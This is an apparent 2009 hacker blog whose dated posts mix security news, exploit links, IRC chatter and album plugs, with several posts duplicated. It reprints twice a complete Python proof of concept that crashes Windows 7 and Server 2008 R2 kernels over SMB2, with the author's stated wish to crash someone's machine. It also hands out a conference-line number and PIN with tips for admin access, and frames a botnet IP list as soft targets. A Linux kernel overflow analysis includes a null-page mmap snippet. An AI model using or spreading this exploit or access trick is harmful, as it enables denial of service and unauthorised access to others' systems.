always carry your USB switchblade. it is getting rough out on the information alleys.
switchblade wiki
Thursday, December 24, 2009
Friday, November 13, 2009
Windows 7 Kernel Crash bug , Microsoft "sudo" patent was bullshit , Blockhead's new album "The Music Scene"
HAPPY FRIDAY THE 13th! Just another excuse to cause digital ruckus. This lady is saying "Hmm, friday the 13th? I think i will BSOD someone's Win7 box..."
Before i get to the sudo thing, let me post some links...
This first one is a device that allows you to remotely play games on your console from your computer. pretty neat eh?
http://gizmodo.com/5359261/spawn-hd+720-is-like-a-slingbox-for-your-console-games
Next, i am sure you have all heard about the spreading iPhone worm that rick rolls you. and another worm deemed iPhone/Privacy.A, that allows an attacker to connect to a jailbroken iPhone which hasn’t had its root password changed. Fun stuff. But check this out, the author of the Rick Astley worm has been getting DEATH THREATS and job offers from the whole thing."
And for some more luls, Britneys twitter account was hacked again.
+++++
Yesterday I recv() a link to gizmodo.com claiming that Microsoft had gotten a patent for the *nix sudo(super user do) command. Of course me and others shit ourselves instantly. To no suprise this claim was a bit off balance. First of all, here is a link to the patent. and now read this to understand a little better.
"Systems and/or methods are described that enable a user to elevate his or her rights. In one embodiment, these systems and/or methods present a user interface
"At arrow 6, user interface 116 presents a
Obviously the linux/unix sudo is in no way related to a GUI, so whatever. Thanks gizmodo for the false hype! How would you have felt if someone had been murdered over this? serious biz!
Laurent Gaffie posted on his blog PoC code and some great information on this flaw, so no reason to re write it. Just click the link above. here is the PoC:
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent GaffiƩ
#
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
+++++
I have to give props to my man Blockhead for his new album "The Music Scene". Blockhead used to make beats for Aesop Rock. His instrumentals are great coding/h4xing fuel and will have your brain dancing with the stars... not the terrible celebrity kind, but the ones in space. here is a **** but please buy it if you like it. I have already pre-ordered the vinyl that will be released Jan 5 of next year.
Link to AMAZON to buy the CD!
Link to other Blockhead and Aesop Rock media for sale!
and the next installment of "KewL GuY oF ThE wEeK" (extras for friday 13th)
Before i get to the sudo thing, let me post some links...This first one is a device that allows you to remotely play games on your console from your computer. pretty neat eh?
http://gizmodo.com/5359261/spawn-hd+720-is-like-a-slingbox-for-your-console-games
Next, i am sure you have all heard about the spreading iPhone worm that rick rolls you. and another worm deemed iPhone/Privacy.A, that allows an attacker to connect to a jailbroken iPhone which hasn’t had its root password changed. Fun stuff. But check this out, the author of the Rick Astley worm has been getting DEATH THREATS and job offers from the whole thing."
+++++
Yesterday I recv() a link to gizmodo.com claiming that Microsoft had gotten a patent for the *nix sudo(super user do) command. Of course me and others shit ourselves instantly. To no suprise this claim was a bit off balance. First of all, here is a link to the patent. and now read this to understand a little better.
"Systems and/or methods are described that enable a user to elevate his or her rights. In one embodiment, these systems and/or methods present a user interface
"At arrow 6, user interface 116 presents a
Obviously the linux/unix sudo is in no way related to a GUI, so whatever. Thanks gizmodo for the false hype! How would you have felt if someone had been murdered over this? serious biz!
Windows 7 / Server 2008R2 Remote Kernel Crash
Laurent Gaffie posted on his blog PoC code and some great information on this flaw, so no reason to re write it. Just click the link above. here is the PoC:
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent GaffiƩ
#
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
+++++
I have to give props to my man Blockhead for his new album "The Music Scene". Blockhead used to make beats for Aesop Rock. His instrumentals are great coding/h4xing fuel and will have your brain dancing with the stars... not the terrible celebrity kind, but the ones in space. here is a **** but please buy it if you like it. I have already pre-ordered the vinyl that will be released Jan 5 of next year.
Link to AMAZON to buy the CD!
Link to other Blockhead and Aesop Rock media for sale!
and the next installment of "KewL GuY oF ThE wEeK" (extras for friday 13th)
Wednesday, November 11, 2009
Google GO Programming Language.
http://golang.org/
At first glance you might think, "wow, just another C based object-oriented programming language" but you should know by now google always steps it up. The bottom line is GO is fast as shit.
"The native Go compilers, called 6g and 8g (for 64-bit and x86), are designed to be extremely fast. There is also an alternative compiler called Gccgo that is based on the GNU Compiler Collection (GCC). The GCC-based compiler isn't as fast but is said to generate more efficient code. I was initially a bit surprised that Google chose not to use the Low-Level Virtual Machine (LLVM) compiler framework—it has a lot of LLVM expertise internally and is using it extensively for their awesome Python optimization effort. Pike says that LLVM was considered during the early stages of the Go project, but its compile-time performance was judged to be inadequate."
here is the video promo for GO!
and a news article from arstechnica.
Being Open-Source we can expect this project to grow and be a part of the mainstream very soon. I highly doubt it will disappoint.
At first glance you might think, "wow, just another C based object-oriented programming language" but you should know by now google always steps it up. The bottom line is GO is fast as shit.
"The native Go compilers, called 6g and 8g (for 64-bit and x86), are designed to be extremely fast. There is also an alternative compiler called Gccgo that is based on the GNU Compiler Collection (GCC). The GCC-based compiler isn't as fast but is said to generate more efficient code. I was initially a bit surprised that Google chose not to use the Low-Level Virtual Machine (LLVM) compiler framework—it has a lot of LLVM expertise internally and is using it extensively for their awesome Python optimization effort. Pike says that LLVM was considered during the early stages of the Go project, but its compile-time performance was judged to be inadequate."
here is the video promo for GO!
and a news article from arstechnica.
Being Open-Source we can expect this project to grow and be a part of the mainstream very soon. I highly doubt it will disappoint.
Tuesday, November 10, 2009
Software That patches itself + CBS 60 minutes on Cyber Warfare
Okay, i am getting input from IRC so i will start posting what people are saying about this. keep brainstorming and contact me if you have any thing to add.
"By observing a program's normal behavior and assigning a set of rules, ClearView detects certain types of errors, particularly those caused when an attacker injects malicious input into a program. When something goes wrong, ClearView detects the anomaly and identifies the rules that have been violated. It then comes up with several potential patches designed to force the software to follow the violated rules. (The patches are applied directly to the binary, bypassing the source code.) ClearView analyzes these possibilities to decide which are most likely to work, then installs the top candidates and tests their effectiveness. If additional rules are violated, or if a patch causes the system to crash, ClearView rejects it and tries another."
http://www.technologyreview.com/computing/23821/
thoughts from IRC:
<@rhythmx> there are tons of auto analysis tools/ideas already... they are mostly full of fail <@rhythmx> and running that tool inline seems like a bad idea... because then you just increased the potential attack surface even more
<@rhythmx> you could maybe trick it into flagging all normal requests as evil ones and DoS all the services
+++
<@neonfreon> if your vendor sucks so bad you have to get a third party binary autopatcher you have problems
<@neonfreon> even if it's doable it's really stupid
<@neonfreon> it's a non deterministic crazy ass software modifier basically doing automated QA and bug fixes on a live, production system
<@neonfreon> that's fucking retarded
<@neonfreon> nobody wants that kind of thing in their enterprise
<@neonfreon> do that in QA labs
<@neonfreon> it has to also suffer from undecidability issues somehow
<@neonfreon> halting problem type issues
<@neonfreon> detect and fault and shutdown is all anyone wants and it's whats out there already
+++
<@jazz> as far as the self-patching thing, I think it's great for the situation they described wrt radiation potentially fucking bits
<@jazz> but if they try to apply it to commercial software I'm gonna laugh my ass off
+++
<@eliteandevil> wonder if you can make manipulate it so that it patches in a backdoor
<@eliteandevil> or makes it vuln to something
<@eliteandevil> making the unexploitable exploitable
<@jazz> I'm sure there'd be a way to poison the well
<@jazz> well remember that kernel bug a while back that only became an exploit due to compiler optimization?
<@jazz> I'm sure something similar would happen with this kinda technology
____________________________________________________________________
"Much of it was still theory, but we were told that before too long it might be possible for a hacker with a computer to disable critical infrastructure in a major city and disrupt essential services, to steal millions of dollars from banks all over the world, infiltrate defense systems, extort millions from public companies, and even sabotage our weapons systems."
this article goes on to talk about possibilities of power grids being shutdown thru cyber warfare and other complete bullshit. I think they fail to realize we got along fine before the internet. Even if attackers could compromise such things as power grids, I am sure there are fail-safe methods to put them back up manually.
heres some shit daily dave thought was WTF, and i agree.
60 Minutes link. Cyber Warfare.
Daily Daves rant
"By observing a program's normal behavior and assigning a set of rules, ClearView detects certain types of errors, particularly those caused when an attacker injects malicious input into a program. When something goes wrong, ClearView detects the anomaly and identifies the rules that have been violated. It then comes up with several potential patches designed to force the software to follow the violated rules. (The patches are applied directly to the binary, bypassing the source code.) ClearView analyzes these possibilities to decide which are most likely to work, then installs the top candidates and tests their effectiveness. If additional rules are violated, or if a patch causes the system to crash, ClearView rejects it and tries another."
http://www.technologyreview.com/computing/23821/
thoughts from IRC:
<@rhythmx> there are tons of auto analysis tools/ideas already... they are mostly full of fail <@rhythmx> and running that tool inline seems like a bad idea... because then you just increased the potential attack surface even more
<@rhythmx> you could maybe trick it into flagging all normal requests as evil ones and DoS all the services
+++
<@neonfreon> if your vendor sucks so bad you have to get a third party binary autopatcher you have problems
<@neonfreon> even if it's doable it's really stupid
<@neonfreon> it's a non deterministic crazy ass software modifier basically doing automated QA and bug fixes on a live, production system
<@neonfreon> that's fucking retarded
<@neonfreon> nobody wants that kind of thing in their enterprise
<@neonfreon> do that in QA labs
<@neonfreon> it has to also suffer from undecidability issues somehow
<@neonfreon> halting problem type issues
<@neonfreon> detect and fault and shutdown is all anyone wants and it's whats out there already
+++
<@jazz> as far as the self-patching thing, I think it's great for the situation they described wrt radiation potentially fucking bits
<@jazz> but if they try to apply it to commercial software I'm gonna laugh my ass off
+++
<@eliteandevil> wonder if you can make manipulate it so that it patches in a backdoor
<@eliteandevil> or makes it vuln to something
<@eliteandevil> making the unexploitable exploitable
<@jazz> I'm sure there'd be a way to poison the well
<@jazz> well remember that kernel bug a while back that only became an exploit due to compiler optimization?
<@jazz> I'm sure something similar would happen with this kinda technology
____________________________________________________________________
"Much of it was still theory, but we were told that before too long it might be possible for a hacker with a computer to disable critical infrastructure in a major city and disrupt essential services, to steal millions of dollars from banks all over the world, infiltrate defense systems, extort millions from public companies, and even sabotage our weapons systems."
this article goes on to talk about possibilities of power grids being shutdown thru cyber warfare and other complete bullshit. I think they fail to realize we got along fine before the internet. Even if attackers could compromise such things as power grids, I am sure there are fail-safe methods to put them back up manually.
heres some shit daily dave thought was WTF, and i agree.
- "Some foreign power" was able to penetrate the Pentagon by leaving infected thumbnail drives where military
personnel would find them, and use them. On the plus side, NOW thumbdrives are banned.
- In 2007, "Some unknown foreign power" penetrated the Department of Defense, Department of State, Department of
Commerce, and they even think NASA, and stole terabytes worth of information. The method of attack wasn't disclosed as
far as I remember.
- Some medical database owned by the state of Virginia was stolen, rm'd, encrypted, and ransomed. Sean Henry, who was
describing it, didn't comment on whether or not the state actually paid the money, but his response seemed to imply
that they did.
60 Minutes link. Cyber Warfare.
Daily Daves rant
Monday, November 9, 2009
Linux kernel Pipe Null Pointer Deref race condition + Offensive-Security.com hacked
Before we get to the fun stuff, giggle at this. Offensive Security's website was hacked through a vuln in their metasploit wiki. HEH. im not going to hate too much because i love backtrack with all my heart. The attackers uploaded an ejeet PHP shell around the 6th and it went unnoticed for 28 hours. this just goes to show you that noone is safe. here is the blog post!
___
This was posted on the 3rd on Xorl, so sorry for the delay. i have to mention it because it is a really good vuln. it exists in fs/pipe.c and can be exploited similar to the Null Pointer Dereference's by spender. The routine in question is called when you open a pipe for writing, and it increments inode->i_pipe->writers to respresent how many writers there are to the pipe. here is that routine:
and while we are ripping information fromm xorl, i guess ill post this heap overflow in Poppler PDF reader that has relatively little importance. Still a good article.
___
This was posted on the 3rd on Xorl, so sorry for the delay. i have to mention it because it is a really good vuln. it exists in fs/pipe.c and can be exploited similar to the Null Pointer Dereference's by spender. The routine in question is called when you open a pipe for writing, and it increments inode->i_pipe->writers to respresent how many writers there are to the pipe. here is that routine:
const struct file_operations write_pipefifo_fops = {02. ...03. .open = pipe_write_open,04. ...05.};06. ...07.static int08.pipe_write_open(struct inode *inode, struct file *filp)09.{10. mutex_lock(&inode->i_mutex);11. inode->i_pipe->writers++;12. mutex_unlock(&inode->i_mutex);13. 14. return 0;15.}
as it says on Xorl %eax, %eax A Null pointer dereference happens when a process opens a pipe at the same time another one releases it(if the release happens first). inode->i_pipe becomes Null. here is the 3 functions that release the pipe:
01.static int02.pipe_read_release(struct inode *inode, struct file *filp)03.{04. return pipe_release(inode, 1, 0);05.}06. 07.static int08.pipe_write_release(struct inode *inode, struct file *filp)09.{10. return pipe_release(inode, 0, 1);11.}12. 13.static int14.pipe_rdwr_release(struct inode *inode, struct file *filp)15.{16. int decr, decw;17. 18. decr = (filp->f_mode & FMODE_READ) != 0;19. decw = (filp->f_mode & FMODE_WRITE) != 0;20. return pipe_release(inode, decr, decw);
21.}and while we are ripping information fromm xorl, i guess ill post this heap overflow in Poppler PDF reader that has relatively little importance. Still a good article.
Saturday, November 7, 2009
Friday, November 6, 2009
SSLV3 MiTM & str0ke funeral coverage.
I am sure a lot of you have had heard about these techniques, but here are 2 good links on the subject. new links added as well.
http://www.g-sec.lu/Renegotiating%20TLS.pdf
https://www.ihteam.net/blog/hacking-tutorial/tls-sslv3-man-in-the-middle-attack/
/* i am fixing the code right now, ill post the revision soon */ here it is. by knife
RIP str0ke!!!
http://www.h-i-r.net/2009/11/schrodingers-hacker.html
okay, now THIS is a bit frightening.
"In Utah, the National Security Agency is building a $2 billion storage facility that will house and analyze all forms of electronic communication...a potential yottabyte of everyone's (formerly) personal data."
btw that is 15 zeros and here is the link from gizmodo
Thursday, October 29, 2009
Hapy BDAY interwebz!@#$ Free Conf, SecureTwitter, and Blackberry eavesdropping fun++
The phone number i am about to post is from "freeconferencecallnetwork.com" we used to goto the site and setup a free conf, which in turn would give us a number and a PIN#. After using it a few times we realized that *every* PIN works *all* the time and they each lead to a different room. The 66666 is just the one we use. * after the pin gives you admin rights and # is normal.
7124321402 66666* <-- your halloween gift! dont wear it out.
ubuntu 9.10 was released a couple of days back and here is the link(ubuntu download page).
to all my anti-ubuntu homies, dont h8, flatulate!
I am skeptical of large anti-virus/malware companies, but Kaspersky and Finjan have released some nifty tools to fight malicious links on social networking sites.
"The company is scanning nearly 500,000 new unique URLs that appear in Twitter posts daily, he said. Of those, anywhere between 100 and 1,000 are malware attacks. Twitter has also been targeted by the Koobface virus which posts malicious links from infected users' accounts."
^ a respectable endeavor in my honest opinion, so check out the article at least.
and even better here is a link at CNET for the free finjan browser plugin dubbed SecureTwitter!
_____
I saw an article about a month ago about blackberrys being prone to attacks through freely available software that is laced with trojans/malware. Not a big suprise, but this is next bit of news is quite amusing.
7124321402 66666* <-- your halloween gift! dont wear it out.
ubuntu 9.10 was released a couple of days back and here is the link(ubuntu download page).
to all my anti-ubuntu homies, dont h8, flatulate!
I am skeptical of large anti-virus/malware companies, but Kaspersky and Finjan have released some nifty tools to fight malicious links on social networking sites.
"The company is scanning nearly 500,000 new unique URLs that appear in Twitter posts daily, he said. Of those, anywhere between 100 and 1,000 are malware attacks. Twitter has also been targeted by the Koobface virus which posts malicious links from infected users' accounts."
^ a respectable endeavor in my honest opinion, so check out the article at least.
and even better here is a link at CNET for the free finjan browser plugin dubbed SecureTwitter!
_____
I saw an article about a month ago about blackberrys being prone to attacks through freely available software that is laced with trojans/malware. Not a big suprise, but this is next bit of news is quite amusing.
BLACKBERRY USERS are being warned that a freely available spyware program will turn their crackberry into a listening device.
The application is called Phonesnoop and allows remote users to listen in on a Blackberry user's surroundings. The spyware app uses standard Blackberry APIs to intercept incoming calls. Once the software is installed, a call from a trigger phone number will activate the listening feature through the phone's built-in speakerphone feature to listen to everything that's going on around the phone."
and last but not least HAPPY BIRTHDAY INTERNETZ!@#$%
On Oct. 29, 1969, First Message Sent Between Two Locations
Friday, October 23, 2009
21,000 vuln embedded devices found in scan of internet
Primarily consisting of LinkSys routers(RLY?) a study posted today showed that over 21,000 embedded devices including webcams, VOiP products, and routers are vulnerable to remote attack. The main reason being that they have admin interfaces publicly facing the net. Not much to say here, other than i am not suprised. interesting article none-the-less. The image of vuln linksys routers made me giggle up my root beer.
http://www.megaplatinum.net/v5/html/ftopict-126009.html
http://www.wired.com/threatlevel/2009/10/vulnerable-devices/
Arduino over Web & My new twitter
http://ultimate-hacker.blogspot.com/2009/09/blinking-led-over-web-with-python.html
This article has the code and howto available on how to make an LED blink over the net with the arduino atmega board. Although this may seem to be useless, it is a great starting point on using the board for anything over the internet using Python, Apache, and PHP.
After years of twitter being the new "cool thing" I have finally made an account. it is located here.
though i doubt i will ever post much. In fact i make fun of tweets all the time. The main reason i want to get familiar with twitter is to use it in non-traditional ways. Our great friend c4thy from immoral.iniquity.net had an excellent idea that i will not post at the moment. It got me to brainstorming, and you guys will be seeing something come out of it in the near future.
Thursday, October 8, 2009
frasunek is bitchmade.
"Hi! My name is Przemyslaw! I hope everyone enjoys my codez. I promise i tried to release them sooner but the FreeBSD security team ignored my frantic emails. I didn't want them to fall in the hands of some hacker before all my dumb admin buddies had a chance to patch"
More than a month after he posted videos of himself using the kqueue() related pipe (fbsd 6.4) and devfs(fbsd <7.2) the whitefag releases his exploits to the pub.
http://www.frasunek.com/pipe.txt
http://www.frasunek.com/devfs.txt
More than a month after he posted videos of himself using the kqueue() related pipe (fbsd 6.4) and devfs(fbsd <7.2) the whitefag releases his exploits to the pub.
http://www.frasunek.com/pipe.txt
FreeBSD 6.4 and below are vulnerable to race condition between pipeclose() and
knlist_cleardel() resulting in NULL pointer dereference. The following code
exploits vulnerability to run code in kernel mode, giving root shell and
escaping from jail.
http://www.frasunek.com/devfs.txt
FreeBSD 7.2 and below (including 6.4) are vulnerable to race condition in VFS
and devfs code, resulting in NULL pointer dereference. In contrast to pipe race
condition, this vulnerability is actually much harder to exploit."
____
In other News:
Milw0rm.com seems to be dead, here is a mirror of the archives.
Wednesday, October 7, 2009
National CyberCrime Awareness Month - IBM AIX rpc.cmsd buffer overflow vuln
it is October, and you know what that means. hack or treat! It is the National Cybercrime Awareness month and someone already posted over 30,000 gmail, windows live, yahoo and other account usernames/passwords <--the list...(BBC article) (dailymail article) but how did this attacker aquire these?.. and why would they post them to the pub? . Most likely a phishing scam, but you never know, it could have something to do with a second party spacker(spammer/hacker) owning a large botnet. anyways check your crap and do not use 123456 or other retarded simple shit as your passwd. People are spooked and here is a crappy article about fighting phishers.
Today, google used a barcode as their daily image. after very little research i found that it is the 57th anniversary of the patent on the "barcode". here is a site that shows you how to make your own like google. with a lot of info on the concept.
IBM AIX stack buffer overflow vuln in rpc.cmsd (calender service) - security focus bid
Patch for AIX 6.1, Patch for AIX 5.3
You might remember a buffer overflow in this service back in 1999 that was widely exploited. ahhh memories!
and now for our COOL GUYS OF THE WEEK! the one on the left looks like Nicholas Cage!
Today, google used a barcode as their daily image. after very little research i found that it is the 57th anniversary of the patent on the "barcode". here is a site that shows you how to make your own like google. with a lot of info on the concept.
IBM AIX stack buffer overflow vuln in rpc.cmsd (calender service) - security focus bid
Patch for AIX 6.1, Patch for AIX 5.3
You might remember a buffer overflow in this service back in 1999 that was widely exploited. ahhh memories!
and now for our COOL GUYS OF THE WEEK! the one on the left looks like Nicholas Cage!
Wednesday, September 23, 2009
Reverse Debugging in GDB 7.0
<@knife> reverse debugging?
<@knife> does that mean it puts bugs back into the program?
<@knife> :P
The new GDB version 7.0 is supposed to be released this month and will finally have reversible debugging features. It will be supported on Native i386 Linux and AMD64 along with several remote targets. GDB is every hackers favorite debugger and I am sure you will all be excited about these new commands.
<@knife> does that mean it puts bugs back into the program?
<@knife> :P
The new GDB version 7.0 is supposed to be released this month and will finally have reversible debugging features. It will be supported on Native i386 Linux and AMD64 along with several remote targets. GDB is every hackers favorite debugger and I am sure you will all be excited about these new commands.
- reverse-continue ('rc') -- Continue program being debugged but run it in reverse
- reverse-finish -- Execute backward until just before the selected stack frame is called
- reverse-next ('rn') -- Step program backward, proceeding through subroutine calls.
- reverse-nexti ('rni') -- Step backward one instruction, but proceed through called subroutines.
- reverse-step ('rs') -- Step program backward until it reaches the beginning of a previous source line
- reverse-stepi -- Step backward exactly one instruction
- set exec-direction (forward/reverse) -- Set direction of execution.
All subsequent execution commands (continue, step, until etc.) will run the program being debugged in the selected direction.
Breakpoints and watchpoints will work in reverse -- allowing you for instance to proceed directly to the previous point at which a variable was modified.
http://www.gnu.org/software/gdb/news/reversible.html
http://sourceware.org/gdb/wiki/ReversibleDebugging
Tuesday, September 22, 2009
BotNet infected IP Ranges, BSOD fun, and the worst Star Wars costumes of all time!
Since there is nothing terribly important to post about at the moment, I will take this time to have a little fun. First of all, I am going to post a couple of funny BSOD images i found recently. ENJOI!
Next is an IP List to shift focus towards . It is a list of ranges that are repeat botnet infected servers/PC's. Some of the ranges are even /16 so it might be a lot to go through, but who knows what some research might bring. Like the forum post said...
"It doesn't take an Einstein to figure out that this IP list is like a shopping list of 'soft targets'... ie ISP's that are obviously vulnerable to being oWn3d. Heck.. they are already owN3d... or they wouldn't have shown up in this list." -courtesy of http://www.infosyssec.com/forum
third: Is this not the lamest Full Disclosure post ever?!?! I have seen some bad ones in my day, but this takes the cake.
[FD] Re: Dumb question: Is Windows box behind a router safe ? [ http://seclists.org/fulldisclosure/2009/Sep/0320.html ]
and last but not least, the worst(or best?) star wars costumes of all time. HEH!
Next is an IP List to shift focus towards . It is a list of ranges that are repeat botnet infected servers/PC's. Some of the ranges are even /16 so it might be a lot to go through, but who knows what some research might bring. Like the forum post said...
"It doesn't take an Einstein to figure out that this IP list is like a shopping list of 'soft targets'... ie ISP's that are obviously vulnerable to being oWn3d. Heck.. they are already owN3d... or they wouldn't have shown up in this list." -courtesy of http://www.infosyssec.com/forum
third: Is this not the lamest Full Disclosure post ever?!?! I have seen some bad ones in my day, but this takes the cake.
[FD] Re: Dumb question: Is Windows box behind a router safe ? [ http://seclists.org/fulldisclosure/2009/Sep/0320.html ]
and last but not least, the worst(or best?) star wars costumes of all time. HEH!
Monday, September 21, 2009
Friday, September 18, 2009
Linux Kernel perf_counter_open() Buffer Overflow Vulnerability
Linux Kernel perf_counter_open() Buffer Overflow Vulnerability.
This issue has been reported to affect Linux kernel 2.6.31-rc1 up to (and including) 2.6.31. Credits go to Xiao Guangrong for discovering this. This bug can be found in /usr/src/linux/kernel/perf_counter.c, specifically in the perf_copy_attr routine.
...
4126 static int perf_copy_attr(struct perf_counter_attr __user *uattr,
4127 struct perf_counter_attr *attr)
4128 {
4129 int ret;
4130 u32 size;
...
4135 /*
4136 * zero the full structure, so that a short copy will be nice.
4137 */
4138 memset(attr, 0, sizeof(*attr));
4139
4140 ret = get_user(size, &uattr->size);
4141 if (ret)
4142 return ret;
4143
4144 if (size > PAGE_SIZE) /* silly large */
4145 goto err_size;
4146
4147 if (!size) /* abi compat */
4148 size = PERF_ATTR_SIZE_VER0;
4149
4150 if (size < PERF_ATTR_SIZE_VER0)
4151 goto err_size;
Okay, as you can see on line 4130, size is declared to be a 32 bit unsigned integer. On line 4138, the first call to get_user is made, and acts as a wrapper to __get_user_check.
The get_user macro provides the main single-value transfer routines, which automatically use the right sizes _if_ and only if we have the right pointer type. In the case shown above, uattr->size (the userland event type attribute) is being reused as an argument for userland to kernel direct assignment mapping, with our unsigned 32 bit integer kernel-land event type attribute size, the macro supports simple types such as char/int, but not larger data types like arrays, and structures.
PAGE_SIZE is defined in /usr/include/asm-generic/page.h to be (1 << PAGE_SHIFT) where PAGE_SHIFT is defined to be 12, resulting in 4096. So, the bug here is that we have to specify a size, and it has to be <= 4096, thus, we can pass it any amount of bytes which is <= PAGE_SIZE, which will copy it into a buffer of that size. This bug can be exploited by mmap'ing the null page, and overwriting the stored ret with 0x0's, or triggering it as a race condition so we can copy arbitrary data from "copy_to_user".
4157 if (size > sizeof(*attr)) {
4158 unsigned long val;
4159 unsigned long __user *addr;
4160 unsigned long __user *end;
4161
4162 addr = PTR_ALIGN((void __user *)uattr + sizeof(*attr),
4163 sizeof(unsigned long));
4164 end = PTR_ALIGN((void __user *)uattr + size,
4165 sizeof(unsigned long));
4166
4167 for (; addr < end; addr += sizeof(unsigned long)) {
4168 ret = get_user(val, addr); // <<< Here.
4169 if (ret)
4170 return ret;
4171 if (val)
4172 goto err_size;
4173 }
4174 }
So now, we can simply change the bytes from userland, into kernel-land with our own content
4175
4176 ret = copy_from_user(attr, uattr, size);
As you can already probably see, by mmap'ing address 0x0, as many upcoming exploits developers have done in recent times would, like so, should be enough for a barebones exploit,
/* Courtesy of Bradley Spengler */
(struct perf_counter_attr *) mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
When calling the sys_perf_counter_open syscall with these arguments. So, as you can see the bug is a pretty routine buffer overflow. Exploit developers should know their way around, from here, and I must applaud Xiao, for finding this, you have a pretty keen eye ;)
And, here's how the patch for this bug was implemented
...
__user *uattr,
if (val)
goto err_size;
}
+ size = sizeof(*attr);
}
ret = copy_from_user(attr, uattr, size);
....
The race condition can be exploited too, in order to achieve essentially the same results. You could probably read more into exploiting kernel based race conditions, and how to force a kernel path to sleep, in the very well written article written by sgrakkyu and twiz in phrack 64.
Thanks go to bob the builder, redsand and nemo for discussing this and
reviewing this for me (apparently, I can't speak english very well)
~hqi ( hqi <> efnet pe )
This issue has been reported to affect Linux kernel 2.6.31-rc1 up to (and including) 2.6.31. Credits go to Xiao Guangrong for discovering this. This bug can be found in /usr/src/linux/kernel/perf_counter.c, specifically in the perf_copy_attr routine.
...
4126 static int perf_copy_attr(struct perf_counter_attr __user *uattr,
4127 struct perf_counter_attr *attr)
4128 {
4129 int ret;
4130 u32 size;
...
4135 /*
4136 * zero the full structure, so that a short copy will be nice.
4137 */
4138 memset(attr, 0, sizeof(*attr));
4139
4140 ret = get_user(size, &uattr->size);
4141 if (ret)
4142 return ret;
4143
4144 if (size > PAGE_SIZE) /* silly large */
4145 goto err_size;
4146
4147 if (!size) /* abi compat */
4148 size = PERF_ATTR_SIZE_VER0;
4149
4150 if (size < PERF_ATTR_SIZE_VER0)
4151 goto err_size;
Okay, as you can see on line 4130, size is declared to be a 32 bit unsigned integer. On line 4138, the first call to get_user is made, and acts as a wrapper to __get_user_check.
The get_user macro provides the main single-value transfer routines, which automatically use the right sizes _if_ and only if we have the right pointer type. In the case shown above, uattr->size (the userland event type attribute) is being reused as an argument for userland to kernel direct assignment mapping, with our unsigned 32 bit integer kernel-land event type attribute size, the macro supports simple types such as char/int, but not larger data types like arrays, and structures.
PAGE_SIZE is defined in /usr/include/asm-generic/page.h to be (1 << PAGE_SHIFT) where PAGE_SHIFT is defined to be 12, resulting in 4096. So, the bug here is that we have to specify a size, and it has to be <= 4096, thus, we can pass it any amount of bytes which is <= PAGE_SIZE, which will copy it into a buffer of that size. This bug can be exploited by mmap'ing the null page, and overwriting the stored ret with 0x0's, or triggering it as a race condition so we can copy arbitrary data from "copy_to_user".
4157 if (size > sizeof(*attr)) {
4158 unsigned long val;
4159 unsigned long __user *addr;
4160 unsigned long __user *end;
4161
4162 addr = PTR_ALIGN((void __user *)uattr + sizeof(*attr),
4163 sizeof(unsigned long));
4164 end = PTR_ALIGN((void __user *)uattr + size,
4165 sizeof(unsigned long));
4166
4167 for (; addr < end; addr += sizeof(unsigned long)) {
